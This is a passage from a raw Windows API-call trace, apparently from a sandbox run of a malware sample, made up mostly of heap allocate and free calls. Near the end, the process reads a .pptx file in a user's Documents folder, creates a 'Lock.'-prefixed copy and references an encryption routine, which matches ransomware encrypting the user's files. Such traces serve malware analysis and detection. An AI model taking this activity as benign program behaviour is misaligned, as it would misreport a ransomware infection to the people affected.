hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0265.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.107] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0265.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0265.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.110] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.110] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.110] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0265.110] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0265.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0265.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/L7MGGQIaJ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\l7mggqiaj.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0265.112] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0265.112] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0265.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0265.112] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.112] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.112] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.113] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0265.113] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.L7MGGQIaJ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.l7mggqiaj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0265.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0265.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0265.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.117] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0265.117] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0265.120] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x53c2, lpOverlapped=0x0) returned 1 [0265.121] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0265.127] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x153c2) returned 0x2f16018 [0265.127] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0265.127] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0265.127] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0265.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0265.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0265.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x153c2) returned 0x2f16018 [0265.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0265.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0265.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0265.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0265.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x153c2) returned 0xe50048 [0265.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0265.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0265.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0265.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0265.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 